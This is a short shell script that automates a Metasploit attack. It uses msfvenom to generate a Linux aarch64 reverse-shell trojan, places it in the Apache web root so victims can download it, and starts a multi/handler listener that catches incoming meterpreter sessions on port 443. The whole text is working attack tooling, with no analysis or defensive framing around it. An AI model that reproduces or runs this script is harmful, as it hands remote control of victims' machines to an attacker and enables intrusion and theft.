touch backdoor.rc
echo "msfvenom --platform linux -p linux/aarch64/shell/reverse_tcp LHOST=$(hostname -I) LPORT=443 -b  "\x00"  -f elf -o trojan.bin" >> backdoor.rc
echo mv trojan.bin /var/www/html/ >> backdoor.rc
echo service apache2 start >> backdoor.rc
echo msfconsole -r metasploit.rc >> backdoor.rc
chmod +x backdoor.rc

touch metasploit.rc
echo use multi/handler >> metasploit.rc
echo set PAYLOAD linux/aarch64/meterpreter/reverse_tcp >> metasploit.rc
echo "set LHOST $(hostname -I)" >> metasploit.rc
echo set LPORT 443 >> metasploit.rc
echo run >> metasploit.rc

./backdoor.rc
